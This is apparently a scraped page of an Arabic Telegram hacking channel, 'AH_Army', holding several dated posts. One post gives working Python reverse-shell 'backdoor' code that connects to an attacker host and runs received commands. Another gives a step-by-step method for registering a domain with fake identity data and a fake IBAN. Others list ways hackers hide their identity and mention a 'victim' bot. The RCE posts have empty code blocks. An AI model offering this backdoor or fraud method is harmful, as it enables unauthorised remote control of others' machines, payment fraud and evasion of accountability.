𝐀ℍ_𝐀rmy™

Description
تهدف 𝐀ℍ_𝐀rmy إلى أن تكون منارة للشجاعة والأمل والتحفيز، وتؤثر بمهارة على حياة سبعة مليارات شخص وتغرس الشعور بالتمكين والتصميم
Advertising
We recommend to visit

قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، ‏أفلام ومسلسلات ، خلفيات ، و المزيد )

Last updated 3 weeks, 3 days ago

يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.

Last updated 4 months, 1 week ago

- بوت الإعلانات: 🔚 @FEFBOT -

- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.

My Tragedy Lies With Those Things That Happen in One Second And Remain

- @NNEEN // 🔚: للأعلانات المدفوعة -

Last updated 2 weeks, 2 days ago

5 months, 1 week ago

*? مشروع: Remote Code Execution في PHP*

? رابط المشروع على
GitHub:
[Remote Code Execution PHP Example]

### وصف المشروع:
هذا المشروع يوضح كيفية استغلال ثغرة Remote Code Execution (RCE) في تطبيق PHP بسيط. يتضمن المشروع شيفرة تحتوي على ثغرة RCE بالإضافة إلى شيفرة مُحسّنة لتفادي هذه الثغرة.

### محتويات المشروع:
1. الملف vulnerable.php:
- يحتوي على شيفرة تعاني من ثغرة RCE.
- مثال على كيفية استغلال الثغرة.

  1. الملف secure.php:
    - يحتوي على شيفرة آمنة مع التحقق من مدخلات المستخدم وتنظيفها.

  2. ملف README.md:
    - يحتوي على شرح مفصل حول الثغرة وكيفية استغلالها، بالإضافة إلى الخطوات المتبعة لتأمين الشيفرة.

### الكود:

```

```

### كيفية الحماية:

```

```

### كيفية استخدام المشروع:
1. قم بتحميل أو استنساخ المشروع من GitHub باستخدام الأمر:

```
git clone https://github.com/yourusername/rce-php-example.git

```

  1. افتح الملفات في محرر النصوص المفضل لديك واستعرض الشيفرة.
  2. اقرأ الملف README.md للحصول على شرح مفصل حول الثغرة وكيفية تأمين الشيفرة.
5 months, 1 week ago

? اكتشاف ثغرة Remote Code Execution في PHP ?

أعلنت مؤخراً عن وجود ثغرة خطيرة في PHP تمكن المهاجمين من تنفيذ أكواد ضارة عن بُعد على السيرفرات المستهدفة. هذه الثغرة تُعد من أخطر أنواع الثغرات لأنها تمنح المهاجمين تحكم كامل بالنظام.

? التفاصيل التقنية:
تستغل الثغرة في دالة معينة داخل الكود الذي يعالج مدخلات المستخدم بطريقة غير آمنة، مما يسمح بحقن أكواد ضارة. للإستفادة من هذه الثغرة، يمكن استخدام الشيفرة التالية:

```

```

⚠️ كيف تحمي نفسك؟
1. لا تستخدم دالة eval أبداً لمعالجة مدخلات المستخدم.
2. تحقق دائمًا من مدخلات المستخدم باستخدام دوال التحقق والتنظيف.
3. قم بتحديث نظامك وبرامجك بشكل دوري لتجنب هذه الثغرات.

? للمزيد من المعلومات وأمثلة عملية:
زر قناتنا على تيليجرام: [AH_Army]?
المطور: [Astra]?.

5 months, 1 week ago

تحليل ملفات الـPDF للكشف عن الثغرات باستخدام بايثون

المحتوى:

في هذا المنشور، سنستعرض كيفية تحليل ملفات الـPDF لاكتشاف الثغرات باستخدام مكتبة PyMuPDF في بايثون.

الكود:

```
import fitz  # PyMuPDF

def analyze_pdf(file_path):
    pdf_document = fitz.open(file_path)
    for page_num in range(len(pdf_document)):
        page = pdf_document.load_page(page_num)
        text = page.get_text("text")
        print(f"Page {page_num + 1}:\n{text}\n{'-'*40}")

if __name__ == "__main__":
    pdf_file_path = "example.pdf"
    analyze_pdf(pdf_file_path)

# تم تطويره بواسطة Astra لقناة AH_Army
```

الوصف:
يمكن استخدام هذا الكود لتحليل نصوص صفحات ملفات الـPDF واستخراج المحتوى النصي منها. يمكن أن يساعد هذا في اكتشاف النصوص المخفية أو البيانات الحساسة التي قد تكون موجودة في الملف.

جميع الحقوق محفوظة لقناة [AH_Army]?
المطور: [Astra]?.

7 months, 3 weeks ago

? كيفية الحصول على دومين مجاني واستضافة ممتازة بطريقة احترافية وسهلة!

? ملاحظة هامة: قم بتشغيل VPN واتصل بخادم في ألمانيا!

الخطوة 1:
قم بزيارة موقع {one.com/de} وفي حقل البحث عن الدومين، اكتب الاسم الذي ترغب فيه لدومينك.

الخطوة 2:
إذا كنت ترغب في الحصول على استضافة مجانية أيضًا، يمكنك الحصول عليها من خلال هذه الطريقة. وإذا كنت لا ترغب في ذلك أو قد قمت بالفعل بإضافتها، انقر على "متابعة".

الخطوة 3:
سيُطلب منك الآن ملء معلومات العميل. قم بزيارة {fake-it.ws/de} وانسخ المعلومات من هذا الموقع والصقها في النموذج.

الخطوة 4:
بالنسبة لعملية الدفع، انقر على "Sepa Direct" واحصل على رقم IBAN من {https://fakeiban.org} فقط.

الخطوة 5:
بعد ملء البيانات، انقر على "متابعة" وقبول جميع الشروط والأحكام.

الخطوة 6:
انتظر لمدة تتراوح بين 2 إلى 5 دقائق حتى يتم تفعيل دومينك. لتغيير DNS أو أسماء الخوادم، انتقل إلى لوحة التحكم وانقر على "DNS" ثم أضف DNS وفقًا لتفضيلاتك.

الخطوة 7: (في حالات نادرة 5%):
في بعض الحالات، قد يُطلب التحقق من الهوية. في هذه الحالة، ستتلقى نموذجًا يجب عليك تنزيله وتوقيعه بتوقيع رقمي، أو يمكنك ببساطة إدخال رقم هاتفك الحقيقي أو المؤقت أثناء طلب الدومين لتفعيله فورًا بعد التحقق.
♕♕♕
نحن غير مسؤولين عن أي استخدام فاحش لهذه الطريقة.
لاتستخدم الطريقة في ما لايرضى الله

@MOSLORD

DexDevTop

7 months, 3 weeks ago

**تنزيل المحتوى المقيد في Telegram

الأوامر (Termux):*?* apt update ? apt upgrade ? pkg install python ? pip install pyrogram tqdm colorama‌‌ انتقل إلى الدليل الذي قمت بتنزيله:*?* cd /sdcard/ [دليل البرامج النصية]

قم بتحرير المقيدةdownloader.py وإضافة معرف API الخاص بك وتجزئة واجهة برمجة التطبيقات.

افتح الآن Termux وانتقل إلى Script Directory باستخدام الأوامر المذكورة أعلاه.

تشغيل الآن:*?* python3 restricteddownloader.py

?|?????_??????
• ─?⚜️?─ •
??ℍ_?rmy?
• ─?──⚜️?─ •
BY-: @mosLord ?
تابعو جميع فديوهات الشرح هنا ?
https://vm.tiktok.com/ZMM3NqpvR/

7 months, 3 weeks ago

```
# فقط للاعمال الصالحة لاتستعملوها للابتزاز
import os
import socket

# انتظر ليتم صنع الباكدور
def create_backdoor(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
while True:
command = s.recv(1024).decode('utf-8')
if command.lower() == "exit":
break
output = os.popen(command).read()
s.send(output.encode())
s.close()

# غير الهوست والبورت
attacker_host = '192.168.1.100'
attacker_port = 4444

create_backdoor(attacker_host, attacker_port)
```

كود يعمل باكدور للاجهزة كود بسيط وجميل
—لاتستعملوه لاشياء تغضب الله سبحانه وتعالى

8 months ago

اذا الضحية مش داخل للبوت ومرسل /start ماتوصله الرسالة

8 months ago

كيف يتخفى الهاكرز ?‍♂️
—————————-
1-الهاكر مش بيستخدم جهازه الشخصي ولكن بيستخدم جهاز مخصص فقط للإختراق .

2- الهاكر بيشتري اللابتوب المخصص للإختراق من مكان مش بيطلب معلومات شخصية ومش بيشتريه من شخص يعرفه .

3- الهاكر بيستخدم نظام وهمي مافيش عليه ملفات تخصه أو أي معلومات شخصية.

4- الهاكر بيستخدم كارت شبكة خارجي Wifi Adapter

5- الهاكر بيغير ال Mac Address وبيستعمل Mac Adress Changer

6- الهاكر بيستخدم خدمات VPN المدفوعة عشان يشفر الاتصال ويغير الموقع الجغرافي

7- الهاكر بيستخدم Fake Gps أو بيعطل ال GPs كلياً

8- الهاكر بيستخدم شبكة Tor في التصفح عشان تشفير بيانات الاتصال والتصفح .

9- الهاكر بيستخدم RDP لتغيير ال IP الى بلد آخر فعلياً.

10- الهاكر بيستخدم Sock 911 وبيتعامل كأنه في بلد آخر بصلاحيات موقع جغرافي كاملة .

11- الهاكر بيستخدم CCleaner لمسح ال log-in وعمليات التصفح على الانترنت

12- الهاكر غالبًا بيتمسك في الآخر ??‍♂️
(Shark )

8 months ago

لو تريدون السلسة كاملة تفاعل

10 months ago

تفاعل القناه قل عن زمان

We recommend to visit

قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، ‏أفلام ومسلسلات ، خلفيات ، و المزيد )

Last updated 3 weeks, 3 days ago

يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.

Last updated 4 months, 1 week ago

- بوت الإعلانات: 🔚 @FEFBOT -

- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.

My Tragedy Lies With Those Things That Happen in One Second And Remain

- @NNEEN // 🔚: للأعلانات المدفوعة -

Last updated 2 weeks, 2 days ago